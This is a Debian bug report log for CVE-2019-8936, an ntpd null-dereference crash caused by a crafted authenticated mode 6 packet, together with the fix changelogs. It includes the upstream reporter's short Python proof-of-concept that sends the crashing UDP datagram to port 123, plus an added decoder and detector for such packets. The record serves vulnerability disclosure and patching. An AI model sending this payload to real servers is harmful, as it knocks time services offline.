ntp: CVE-2019-8936: Crafted null dereference attack in authenticated mode 6 packet

Related Vulnerabilities: CVE-2019-8936  

Debian Bug report logs - #924228

Reported by: Salvatore Bonaccorso <carnil@debian.org>

Date: Sun, 10 Mar 2019 13:12:02 UTC

Severity: important

Tags: security, upstream

Found in version ntp/1:4.2.8p12+dfsg-3

Fixed in versions ntp/1:4.2.8p13-1, ntp/1:4.2.8p13+dfsg-1, ntp/1:4.2.8p12+dfsg-4

Done: Bernhard Schmidt <berni@debian.org>

Bug is archived. No further changes may be made.

Forwarded to http://bugs.ntp.org/show_bug.cgi?id=3565



Report forwarded to debian-bugs-dist@lists.debian.org, carnil@debian.org, team@security.debian.org, team@security.debian.org, Debian NTP Team <ntp@packages.debian.org>:
Bug#924228; Package src:ntp. (Sun, 10 Mar 2019 13:12:04 GMT)


Acknowledgement sent to Salvatore Bonaccorso <carnil@debian.org>:
New Bug report received and forwarded. Copy sent to carnil@debian.org, team@security.debian.org, team@security.debian.org, Debian NTP Team <ntp@packages.debian.org>. (Sun, 10 Mar 2019 13:12:05 GMT)


Message #5 received at submit@bugs.debian.org:

From: Salvatore Bonaccorso <carnil@debian.org>
To: Debian Bug Tracking System <submit@bugs.debian.org>
Subject: ntp: CVE-2019-8936: Crafted null dereference attack in authenticated mode 6 packet
Date: Sun, 10 Mar 2019 14:08:47 +0100
Source: ntp
Version: 1:4.2.8p12+dfsg-3
Severity: important
Tags: security upstream
Forwarded: http://bugs.ntp.org/show_bug.cgi?id=3565

Hi,

The following vulnerability was published for ntp.

CVE-2019-8936[0]:
Crafted null dereference attack in authenticated mode 6 packet

If you fix the vulnerability please also make sure to include the
CVE (Common Vulnerabilities & Exposures) id in your changelog entry.

To verify/illustrate the issue/fix one can use the following as
provided by the reporter in the upstream report:

	#!/usr/bin/env python
	import sys
	import socket

	buf = ("\x16\x03\x00\x03\x00\x00\x00\x00\x00\x00\x00\x04\x6c\x65\x61\x70" +
	       "\x00\x00\x00\x01\x5c\xb7\x3c\xdc\x9f\x5c\x1e\x6a\xc5\x9b\xdf\xf5" +
	       "\x56\xc8\x07\xd4")

	sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
	sock.sendto(buf, ('127.0.0.1', 123))

and running ntpd under valgrind as

	valgrind ntpd -n -c ~/resources/ntp.conf

with ntp.conf:

	logfile /tmp/ntp.log
	restrict 127.0.0.1
	keys /path/to/keys
	trustedkey 1
	controlkey 1
	requestkey 1

and keys

	1 M gurka
	2 M agurk


For further information see:

[0] https://security-tracker.debian.org/tracker/CVE-2019-8936
    https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-8936
[1] http://bugs.ntp.org/show_bug.cgi?id=3565
[2] http://bk.ntp.org/ntp-stable/ntpd/ntp_control.c?PAGE=diffs&REV=5c8106e7wWtXdh0lzg1ytlWribBTcQ

Please adjust the affected versions in the BTS as needed.

Regards,
Salvatore
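
The test datagram from the message above, decoded field by field as an added example (not part of the original report or of ntpd). The layout follows the NTP control message format of RFC 1305 Appendix B; the names SAMPLE, decode_mode6 and is_authenticated_write are chosen here. It shows what the 36 bytes are, and gives one way to pick out requests of the same shape in captured UDP/123 traffic.

```python
import struct

# Constructed sample: the same 36 bytes as `buf` in the report's test script.
SAMPLE = bytes.fromhex(
    "160300030000000000000004"            # 12-byte control header
    "6c656170"                            # data: "leap"
    "00000001"                            # key ID 1
    "5cb73cdc9f5c1e6ac59bdff556c807d4"    # 16-byte MAC
)

# Opcodes defined in RFC 1305 Appendix B (ntpd defines further ones).
OPCODES = {1: "read status", 2: "read variables", 3: "write variables",
           4: "read clock variables", 5: "write clock variables"}

def decode_mode6(pkt):
    """Decode an NTP control (mode 6) datagram; return None if it is not one."""
    if len(pkt) < 12:
        return None
    lvm, rem_op, seq, status, assoc, offset, count = struct.unpack(
        "!BBHHHHH", pkt[:12])
    if lvm & 0x07 != 6:                   # low three bits carry the mode
        return None
    padded = (count + 3) & ~3             # data is padded to a 32-bit boundary
    if 12 + padded > len(pkt):
        return None                       # count field exceeds the datagram
    trailer = pkt[12 + padded:]           # optional authenticator
    info = {
        "version": (lvm >> 3) & 0x07,
        "response": bool(rem_op & 0x80),
        "opcode": rem_op & 0x1F,
        "opname": OPCODES.get(rem_op & 0x1F, "other"),
        "sequence": seq,
        "association": assoc,
        "data": pkt[12:12 + count],
        "key_id": None,
        "mac_len": 0,
    }
    if len(trailer) >= 4:                 # 4-byte key ID, then the digest
        info["key_id"] = struct.unpack("!I", trailer[:4])[0]
        info["mac_len"] = len(trailer) - 4
    return info

def is_authenticated_write(pkt):
    """True for a mode 6 request that carries a key ID and writes variables."""
    info = decode_mode6(pkt)
    return bool(info and not info["response"]
                and info["key_id"] is not None and info["opcode"] in (3, 5))
```

For SAMPLE this yields version 2, opcode 3 (write variables), data "leap", key ID 1 and a 16-byte MAC, which matches the controlkey 1 setting in the test ntp.conf.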



Reply sent to Bernhard Schmidt <berni@debian.org>:
You have taken responsibility. (Thu, 21 Mar 2019 21:42:11 GMT)


Notification sent to Salvatore Bonaccorso <carnil@debian.org>:
Bug acknowledged by developer. (Thu, 21 Mar 2019 21:42:11 GMT)


Message #10 received at 924228-close@bugs.debian.org:

From: Bernhard Schmidt <berni@debian.org>
To: 924228-close@bugs.debian.org
Subject: Bug#924228: fixed in ntp 1:4.2.8p13-1
Date: Thu, 21 Mar 2019 21:38:45 +0000
Source: ntp
Source-Version: 1:4.2.8p13-1

We believe that the bug you reported is fixed in the latest version of
ntp, which is due to be installed in the Debian FTP archive.

A summary of the changes between this version and the previous one is
attached.

Thank you for reporting the bug, which will now be closed.  If you
have further comments please address them to 924228@bugs.debian.org,
and the maintainer will reopen the bug report if appropriate.

Debian distribution maintenance software
pp.
Bernhard Schmidt <berni@debian.org> (supplier of updated ntp package)

(This message was generated automatically at their request; if you
believe that there is a problem with it please contact the archive
administrators by mailing ftpmaster@ftp-master.debian.org)


Format: 1.8
Date: Thu, 21 Mar 2019 22:01:16 +0100
Source: ntp
Architecture: source
Version: 1:4.2.8p13-1
Distribution: experimental
Urgency: medium
Maintainer: Debian NTP Team <ntp@packages.debian.org>
Changed-By: Bernhard Schmidt <berni@debian.org>
Closes: 764546 772790 924228
Changes:
 ntp (1:4.2.8p13-1) experimental; urgency=medium
 .
   * New upstream version 4.2.8p13
     - CVE-2019-8936: Crafted null dereference attack in authenticated
       mode 6 packet (Closes: #924228)
   * ntp: exit 0 from init script if daemon does not exist (Closes: #764546)
   * Drop locking from ntp initscript/systemd-wrapper
   * Only delete ntpd statistics files in cronjob (Closes: #772790)




Reply sent to Bernhard Schmidt <berni@debian.org>:
You have taken responsibility. (Thu, 21 Mar 2019 23:15:10 GMT)


Notification sent to Salvatore Bonaccorso <carnil@debian.org>:
Bug acknowledged by developer. (Thu, 21 Mar 2019 23:15:10 GMT)


Message #15 received at 924228-close@bugs.debian.org:

From: Bernhard Schmidt <berni@debian.org>
To: 924228-close@bugs.debian.org
Subject: Bug#924228: fixed in ntp 1:4.2.8p13+dfsg-1
Date: Thu, 21 Mar 2019 23:11:09 +0000
Source: ntp
Source-Version: 1:4.2.8p13+dfsg-1

Format: 1.8
Date: Thu, 21 Mar 2019 23:31:10 +0100
Source: ntp
Architecture: source
Version: 1:4.2.8p13+dfsg-1
Distribution: experimental
Urgency: medium
Maintainer: Debian NTP Team <ntp@packages.debian.org>
Changed-By: Bernhard Schmidt <berni@debian.org>
Closes: 764546 772790 924228
Changes:
 ntp (1:4.2.8p13+dfsg-1) experimental; urgency=medium
 .
    * New upstream version 4.2.8p13+dfsg
      - CVE-2019-8936: Crafted null dereference attack in authenticated
        mode 6 packet (Closes: #924228)
    * ntp: exit 0 from init script if daemon does not exist (Closes: #764546)
    * Drop locking from ntp initscript/systemd-wrapper
    * Only delete ntpd statistics files in cronjob (Closes: #772790)




Reply sent to Bernhard Schmidt <berni@debian.org>:
You have taken responsibility. (Thu, 11 Apr 2019 21:12:10 GMT)


Notification sent to Salvatore Bonaccorso <carnil@debian.org>:
Bug acknowledged by developer. (Thu, 11 Apr 2019 21:12:10 GMT)


Message #20 received at 924228-close@bugs.debian.org:

From: Bernhard Schmidt <berni@debian.org>
To: 924228-close@bugs.debian.org
Subject: Bug#924228: fixed in ntp 1:4.2.8p12+dfsg-4
Date: Thu, 11 Apr 2019 21:08:17 +0000
Source: ntp
Source-Version: 1:4.2.8p12+dfsg-4

Format: 1.8
Date: Thu, 21 Mar 2019 23:42:36 +0100
Source: ntp
Architecture: source
Version: 1:4.2.8p12+dfsg-4
Distribution: unstable
Urgency: medium
Maintainer: Debian NTP Team <ntp@packages.debian.org>
Changed-By: Bernhard Schmidt <berni@debian.org>
Closes: 764546 772790 924228
Changes:
 ntp (1:4.2.8p12+dfsg-4) unstable; urgency=medium
 .
   * CVE-2019-8936: Crafted null dereference attack in authenticated
     mode 6 packet (Closes: #924228)
   * ntp: exit 0 from init script if daemon does not exist (Closes: #764546)
   * Drop locking from ntp initscript/systemd-wrapper
   * Only delete ntpd statistics files in cronjob (Closes: #772790)




Bug archived. Request was from Debbugs Internal Request <owner@bugs.debian.org> to internal_control@bugs.debian.org. (Fri, 10 May 2019 07:26:26 GMT)



Debian bug tracking system administrator <owner@bugs.debian.org>. Last modified: Wed Jun 19 14:34:44 2019; Machine Name: beach